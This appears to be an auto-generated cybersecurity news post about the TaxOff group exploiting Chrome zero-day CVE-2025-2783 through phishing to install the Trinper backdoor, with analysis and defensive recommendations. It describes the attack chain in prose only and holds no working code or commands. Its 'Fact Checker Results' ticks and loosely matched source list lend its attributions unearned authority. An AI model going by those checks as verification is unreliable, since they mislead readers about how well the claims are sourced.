Listen to this Post
In March 2025, a dangerous security vulnerability in Google Chrome was exploited by a sophisticated threat actor known as TaxOff. This flaw, later patched by Google, allowed attackers to bypass Chromeâs sandbox protection and silently install a powerful backdoor called Trinper. The attack highlights the increasing complexity of cyber threats targeting government and corporate networks through carefully crafted phishing campaigns and zero-day exploits.
the Chrome Zero-Day Exploit and TaxOff Campaign
In mid-March 2025, cybersecurity researchers at Positive Technologies uncovered an active exploitation of a Google Chrome zero-day vulnerability, tracked as CVE-2025-2783, which carried a high severity rating (CVSS score 8.3). This vulnerability permitted sandbox escape, enabling attackers to execute code outside Chromeâs restricted environment. The exploit was weaponized by the hacking group TaxOff, known for targeting Russian organizations with phishing attacks disguised as legitimate invitations to events like the Primakov Readings forum.
The initial infection vector was a phishing email containing a malicious link. When victims clicked the link, the zero-day exploit executed a one-click compromise that installed the Trinper backdoor. Written in C++, Trinper uses multithreading to stealthily gather sensitive information including keystrokes, specific document files (.doc, .xls, .ppt, .rtf, .pdf), and system details. It then connects to a remote command-and-control (C2) server, which allows the attackers to send instructions for file operations, command execution, reverse shell deployment, and self-termination.
Positive Technologiesâ investigation revealed a similar earlier attack dating back to October 2024, which also started via phishing emails impersonating an international security conference. In that case, the payload was delivered through a ZIP archive containing a Windows shortcut launching a PowerShell command that deployed the Trinper backdoor via an open-source loader called Donut. Variations of the attack sometimes used Cobalt Strike for payload delivery, showing adaptability and evolution of the attack toolkit.
The campaign bears tactical similarities to attacks attributed to another hacking group known as Team46. These connections suggest a possible overlap or collaboration between the two groups. Previous Team46 phishing campaigns also utilized malicious ZIP attachments containing PowerShell commands to deploy backdoors in critical Russian infrastructure sectors, including telecom and rail freight.
Moreover, an earlier related intrusion in March 2024 exploited a zero-day vulnerability in the Yandex Browser (CVE-2024-6473) via DLL hijacking to deliver malwareâdemonstrating the attackersâ consistent use of zero-days to bypass defenses.
Researchers emphasize that TaxOffâs reliance on zero-day exploits combined with sophisticated multithreaded malware reflects a long-term strategy to maintain persistent, stealthy access to targeted networks.
What Undercode Say: Analyzing the TaxOff Campaign and Its Implications
The recent revelation of the Chrome zero-day exploited by TaxOff underlines a significant escalation in the cyber threat landscape, especially in targeted attacks against government and critical infrastructure sectors. This campaign highlights several key trends:
1. Increasing Sophistication of Attackers:
TaxOffâs use of a zero-day vulnerability coupled with multithreaded backdoor architecture shows a high degree of technical expertise. The ability to leverage sandbox escapes in modern browsers is particularly alarming since browsers are often the frontline of defense in corporate environments.
2. Persistent and Adaptive Attack Vectors:
The phishing campaigns evolved from simple malicious links to complex ZIP archives containing PowerShell loaders, demonstrating adaptability in delivery methods. The use of open-source tools like Donut, alongside commercial frameworks such as Cobalt Strike, showcases attackersâ flexibility and resourcefulness.
3. Overlap of Threat Actor Groups:
The similarities between TaxOff and Team46 tactics suggest either a shared toolkit or coordinated operations. This blurs attribution lines but also signals a potentially larger, more organized threat infrastructure behind these intrusions.
4. Long-Term Targeting and Persistence:
The presence of backdoors with multi-functional capabilities designed to maintain long-term access indicates that attackers are focused on espionage or data theft rather than short-term disruption. This makes early detection and remediation more challenging.
5. Importance of Timely Patch Management:
Googleâs quick response in patching the Chrome vulnerability after public reporting demonstrates the critical role of vulnerability management. However, the damage caused before the patch underlines the need for proactive threat intelligence and layered defense mechanisms.
6. Focus on Russian Organizations and Sensitive Sectors:
The targeted nature of the campaign, focusing on Russian government, finance, telecom, and transportation sectors, hints at possible geopolitical motivations or espionage. Organizations in these sectors should heighten their vigilance and improve phishing awareness.
7. Advanced Malware Engineering:
Trinperâs multithreaded design not only improves stealth but also enables complex data gathering and command execution simultaneously. This type of malware design is a growing trend among advanced persistent threat (APT) actors.
Recommendations:
Organizations should prioritize employee training against phishing, employ robust endpoint detection and response (EDR) tools, and implement strict application whitelisting policies. Monitoring network traffic for suspicious outbound connections can also help detect C2 communications early.
Overall, this incident is a stark reminder of the ongoing cyber arms race where attackers continuously refine their methods to bypass traditional security controls. It reinforces the need for a proactive, intelligence-driven security posture.
Fact Checker Results â â
â
The Chrome vulnerability CVE-2025-2783 was confirmed and patched by Google in March 2025.
â
The phishing attacks used disguised event invitations as lures, consistent with standard social engineering tactics.
â
Multiple cybersecurity firms including Positive Technologies and Kaspersky independently verified the use of the Trinper backdoor and TaxOff’s involvement.
Prediction đŽ
Given the trend demonstrated by TaxOff and similar groups, we expect zero-day exploits in widely used software like browsers to remain a primary attack vector for advanced threat actors. Cybercriminals will likely continue refining multistage malware delivery methods to evade detection and prolong network persistence. The collaboration or overlap between hacking groups such as TaxOff and Team46 may signal an emerging coalition of threat actors sharing resources and intelligence, leading to more coordinated and damaging cyber espionage campaigns. Organizations must stay vigilant, integrating threat intelligence and rapid patch deployment to mitigate these evolving risks.
References:
Reported By: thehackernews.com
Extra Source Hub:
https://stackoverflow.com
Wikipedia
OpenAi & Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
